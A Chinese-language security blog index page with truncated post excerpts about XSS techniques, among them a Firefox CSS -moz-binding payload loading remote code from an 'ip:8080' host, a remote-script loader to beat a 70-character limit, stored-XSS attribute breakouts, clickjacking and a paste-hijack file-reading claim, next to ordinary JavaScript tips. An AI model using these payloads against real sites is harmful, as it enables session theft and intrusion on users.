Quantum Intelligence

   今天一大早茄子就在群里发了这个连接 http://www.milw0rm.com/papers/265看完后JX也感叹啊，难道以后的路就是要这样猥琐吗？不禁让我想起很久以前别人提过的猥琐欺骗方式  首先设置了鼠标的样式，不会有一个手指的形状，然后绝对定位，透明掉~~

测试了IE 不成功TMD~~~，FF可以！import.jspresponse.addHeader("Link", " ; REL=stylesheet") ;%> xss   xss.cssbody{-moz-binding:url("http://ip:8080/myweb/1.xml#xss");}body{background: yellow}1.xml                  

      今天跟AMXSA在弄一个XSS的时候就讨论到，字符长度限制了70个，该XSS是出现在 ， 后来他说对方过滤了 " 这样 只能有限的调用。开始我建议他 多弄几个 后来他尝试了发现不可以对方处理             想想平时我们XSS导入一个远程的JS就是为了执行更多的代码，更方便。    1.        window.k=document.createElement(Sc

     某网站存在一个 storeXSS  利用点如下可以使用 双引号绕过去属性限制，但是不能采用 比较郁闷开始打算  "style="kj:expression(EXP)后来查了查资料！发现expression是IE 才能使用的！郁闷了！而且要XSS的对象是老外 ，不一定会采用IE ，这样跨站攻击起来了，但是效果会大打折扣。想想还是添加事件吧！但是，怎么触发这个事件呢！?   无奈之下让我想

2年前,当时自己在写ASPSHELL的时候 一直不理解为什么GetObject("WinNT://.") 可以获得本地系统 的一些重要信息当时MSDN是这样一个解析的-----------Windows 脚本宿主   GetObject 方法请参阅WScript 对象 | CreateObject 方法 | DisconnectObject 方法用指定的 ProgID 检索现有的对

采用JS的时候 有很多地方需要动态的添加事件驱动例如 你需要为一个object 的onclick事件添加一个方法或者改变里面的方法 一般人都会想起用最简单的outerHTML 来直接替换就最容易了~ 但是并不是所有的object 都支持outerHTML 写操作的那么我们就需要采用JS里面的事件动态添加了第一种方法就是 对象.事件=函数object.onclick = function m

写JS的时候 获取select对象的value是很常见的事情 例如 function selectInput(choose) {     alert(choose.value);  }         January         February         March         April         May         June         July       

采用AJAX技术的时候 通常我们无刷新页面提交数据后 用同样的url去获取数据的时候会发现是以前的数据~那样就给client端带来假象了~~ 采用以下的方法可以取消缓存htm网页 或者 asp网页 response.expires=-1 response.expiresabsolute=now()-1 response.cachecontrol="no-cache" php网页 head

author : kj021320team : I.S.T.O 这样的攻击手段也算是极其无耻 猥琐之极! 所以防御措施一定要做好      首先说一下通过Javascript Paste Keyboard Shortcuts Hijack能做什么???能够读取你本地机器任何文件! 没错!也就是说 你中了任何一个XSS 加上你按了粘贴快捷键后,你就有可能被别人读取你机上任何的文件!